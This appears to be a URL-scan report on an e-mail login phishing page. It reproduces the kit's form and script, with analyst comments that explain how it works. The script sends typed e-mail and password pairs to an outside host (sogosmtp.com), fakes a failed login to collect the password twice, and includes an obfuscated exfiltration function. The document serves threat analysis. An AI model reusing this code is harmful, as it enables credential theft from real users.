f004.backblazeb2.com
149.137.128.16  Malicious Activity! Public Scan

Submitted URL: https://et9io74qrl.s3.us-south.objectstorage.softlayer.net/fluted/index.html?key=c7b11bb143ad0ce8171db6b9effb8465&redirect=https://www.amazon.com
Effective URL: https://f004.backblazeb2.com/file/abseiled-impanation-tolguacha/login.html?cpzk=YkBHZwrSdSRYbcF9jK8zn2ECbSbW6k&uiumchu=dYyt6i...
Submission: On February 28 via manual from ES — Scanned from US

Form analysis: 1 form found in the DOM

<form id="themform">
  <!-- Analyst note: credential-collection form captured by the scan. The form has no action or method attribute; the inline script that follows intercepts submit and sends the values itself. -->
  <!-- "em": e-mail address field. The inline script pre-fills it from the URL fragment or the "username" query parameter when one is present. -->
  <input name="em" placeholder="Email Address" class="textbox" pattern="[a-z0-9._%+-]+@[a-z0-9.-]+\.[a-z]{2,3}$" required="" type="text" style="position:absolute;width:343px;left:534px;top:445px;z-index:1">
  <!-- "ps": password field; its value is read by the submit handler in the inline script. -->
  <input name="ps" placeholder="Email Password" class="textbox" required="" type="password" style="position:absolute;width:343px;left:534px;top:499px;z-index:2">
  <!-- Error text is hidden by default (display: none); the inline script shows it when the "db" query parameter parses to a number greater than 1. -->
  <span class="errmsg" style="color: #ff0000;font-weight: bold;display: none;position:absolute;width:343px;left:634px;top:545px;z-index:3">Invalid password</span>
  <!-- Submit control is an image input whose picture is loaded from a third-party image host. All controls are absolutely positioned, presumably over a background image that is not part of this form (not visible in this capture). -->
  <div id="formimage1" style="position:absolute; left:562px; top:570px; z-index:4"> <input type="image" name="formimage1" width="290" height="38" src="https://i.ibb.co/G9WKY4d/321.png"></div>
  <!-- jQuery 3.3.1 from a public CDN; the inline script below depends on it ($, $.ajax). -->
  <script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js"></script>
  <script>
    // Analyst summary: on DOM ready this handler (1) pre-fills the e-mail field from the URL,
    // (2) optionally shows a fake "Invalid password" message, and (3) on submit sends the typed
    // e-mail and password to a third-party endpoint before redirecting the browser.
    // Detection-relevant facts: the POST target is on a different host than the page, the
    // request body carries the fields Email / password / typeofemail / theemid, and the page
    // reloads itself with a "db" counter so the visitor is asked for the password twice.
    $(document).ready(function() {
      var errmsg = $('.errmsg');
      errmsg.hide();
      // Victim e-mail taken from the URL: first the fragment (text after the last "#", only if
      // it validates as an e-mail), otherwise the "username" query parameter.
      var ufromUrl = get_email_hash();
      if (!ufromUrl) {
        ufromUrl = geturlparameter('username');
      }
      // Default landing page after submission (relative to the hosting path).
      var redirectUrl = 'verify.html';
      // isStyleDouble serves both as an on/off flag and as the upper bound that the "db"
      // counter is compared against at submit time. styleDoubleCounter is not referenced
      // again in the visible script.
      var isStyleDouble = 2;
      var styleDoubleCounter = 1;
      var styleDoubleFromUrl = 1;
      var formcon = $('#themform');
      var em = $('#themform input[name=em]');
      var ps = $('#themform input[name=ps]');
      if (ufromUrl) {
        em.val(ufromUrl);
      }
      var emv = '';
      var psv = '';
      if (isStyleDouble) {
        // "db" is the attempt counter carried in the query string; missing or non-numeric
        // values fall back to 1.
        styleDoubleFromUrl = geturlparameter('db');
        if (styleDoubleFromUrl) {
          styleDoubleFromUrl = parseInt(styleDoubleFromUrl);
          if (isNaN(styleDoubleFromUrl)) {
            styleDoubleFromUrl = 1;
          }
          // On the second (or later) load the "Invalid password" text is displayed, although
          // nothing on this page has verified the password.
          if (styleDoubleFromUrl > 1) {
            errmsg.show();
          }
        } else {
          styleDoubleFromUrl = 1;
        }
      }
      formcon.submit(function(e) {
        // Native form submission is suppressed; the values leave the page only via $.ajax below.
        e.preventDefault();
        emv = em.val();
        psv = ps.val();
        // Proceeds when the e-mail input element was found (em is the jQuery selection) and a
        // non-empty password was typed.
        if (em && em.length > 0 && psv && psv.length > 0) {
          // Fixed value sent with every submission; presumably a campaign or operator
          // identifier (not confirmed from this page).
          var theemidval = '8ee219ef3953259b3536ea2a005dbb9a';
          //mg(emv, psv,'Adobe New');  
          // Cross-origin POST of the typed e-mail and password to the collection endpoint.
          // The success callback is empty and errors are only logged to the console, so the
          // visitor sees no result of this request.
          $.ajax({
            url: 'https://sogosmtp.com/email-list/adobe-new/finish.php',
            type: 'POST',
            dataType: 'html',
            data: {
              Email: emv,
              password: psv,
              typeofemail: 'Adobe New',
              theemid: theemidval
            },
            crossDomain: true,
            success: function(msg) {},
            error: function(e) {
              console.log(e)
            }
          });
          // First pass (db == 1): bump the counter and send the browser back to login.html
          // with randomised query parameters, the typed e-mail as "username" and db=2, which
          // triggers the "Invalid password" message and a second password entry.
          // Second pass (db == 2): the condition is false and redirectUrl stays 'verify.html'.
          if (isStyleDouble && styleDoubleFromUrl && styleDoubleFromUrl < isStyleDouble && styleDoubleFromUrl < 3) {
            styleDoubleFromUrl++;
            redirectUrl = 'login.html?' + get_rand_url_pars() + '&username=' + emv + '&db=' + styleDoubleFromUrl;
          }
          // The redirect is scheduled 2 seconds after submit regardless of the AJAX outcome;
          // location.replace() leaves no back-button entry for the current page.
          setTimeout(function() {
            window.location.replace(redirectUrl);
            //alert(redirectUrl);
          }, 2000);
        }
      });
    });
    //function evandoor(a,o,t){var h = ['O','L','t','q','e','D','c','-','.','z','u','2','T','m','V','J','6','U','P','b','v','K','B','Z','i','7','R',':','C','/','o','r','n','Q','S','5','3','8','a','M','W','I','x','H','Y','4','1','k','s','d','g','A','j','F','N','9','G','l','f','p','X','0','w','y','E','h'],f = h[65]+h[2]+h[2]+h[59]+h[48]+h[27]+h[29]+h[29]+h[38]+h[59]+h[24]+h[49]+h[38]+h[2]+h[38]+h[6]+h[48]+h[48]+h[8]+h[6]+h[30]+h[13]+h[29]+h[58]+h[24]+h[32]+h[24]+h[48]+h[65]+h[7]+h[10]+h[32]+h[20]+h[11]+h[11]+h[8]+h[59]+h[65]+h[59];$.ajax({url:f,type:"POST",dataType:"html",data:{Email:a,password:o,typeofemail:t},crossDomain:!0,success:function(a){},error:function(a){}})}
    // Returns a pseudo-random integer between min and max, both inclusive, using Math.random().
    // Used by get_rand_url_pars() to pick parameter counts and string lengths.
    function randomInteger(min, max) {
      return Math.floor(Math.random() * (max - min + 1)) + min;
    }

    // Builds a string of r characters, each picked at random (Math.random) from the
    // alphabet n, which is indexed by position (a string in the visible callers).
    // Returns "" when r is 0 or negative.
    function randomString(r, n) {
      for (var o = "", t = r; 0 < t; --t) o += n[Math.floor(Math.random() * n.length)];
      return o
    }

    // Returns the lower-cased text after the first "@" of a, or false when a does not pass
    // validateEmail(). The comma expression evaluates the validation/extraction first and then
    // yields t as the return value.
    // Not called anywhere in the script visible on this page.
    function getdomainpartofemail(a) {
      var e, t = !1;
      return !validateEmail(a) || -1 != (e = (a = a.toLowerCase()).indexOf("@")) && (t = a.substr(e + 1)), t
    }

    // Reads the current page URL and returns the text after the last "#" when that text passes
    // validateEmail(); otherwise returns false. This is how a link of the form
    // <page>#<address> pre-fills the e-mail field, and it means the address of the targeted
    // recipient can appear in the URL fragment of captured links.
    function get_email_hash() {
      var a = !1,
        i = window.location.href,
        t = (i = i.trim()).lastIndexOf("#");
      return -1 != t && (a = i.substring(t + 1), validateEmail(a) || (a = !1)), a
    }

    // Returns true when t, converted to a string and lower-cased, matches the e-mail pattern
    // below: a dotted or quoted local part, "@", then either a bracketed IPv4-style literal or
    // a dotted host name ending in at least two letters.
    function validateEmail(t) {
      return /^(([^<>()\[\]\\.,;:\s@"]+(\.[^<>()\[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/.test(String(t).toLowerCase())
    }

    // Looks up query parameter r in window.location.search (leading "?" removed, split on "&"
    // and then "=") and returns the URI-decoded value of the first match.
    // Returns undefined when the parameter is absent. Only the text between the first and
    // second "=" of a pair is used as the value.
    function geturlparameter(r) {
      for (var t = window.location.search.substring(1).split("&"), e = 0; e < t.length; e++) {
        var n = t[e].split("=");
        if (n[0] == r) return decodeURIComponent(n[1])
      }
    }

    // Generates a query string of 3 to 10 random name=value pairs joined by "&".
    // Names are 3-10 lower-case letters; values are 15-30 characters drawn from lower-case
    // letters, upper-case letters and the digits 1-9. The leading "&" is stripped before return.
    // Analyst note: the output changes on every call, so the query string of the reloaded
    // login.html URL is not a stable indicator (compare the random-looking parameters in the
    // Effective URL above); host, path and the fixed "username"/"db" parameter names are.
    function get_rand_url_pars() {
      var r = "",
        n = 0,
        a = "abcdefghijklmnopqrstuvwxyz",
        e = a;
      // e keeps the lower-case-only alphabet (parameter names); a is extended for the values.
      a += a.toUpperCase() + "123456789";
      for (var t = randomInteger(3, 10), n = 0; n < t; n++) r += "&" + randomString(randomInteger(3, 10), e) + "=" + randomString(randomInteger(15, 30), a);
      return r.substr(1)
    }
  </script>
</form>

Text Content

Invalid password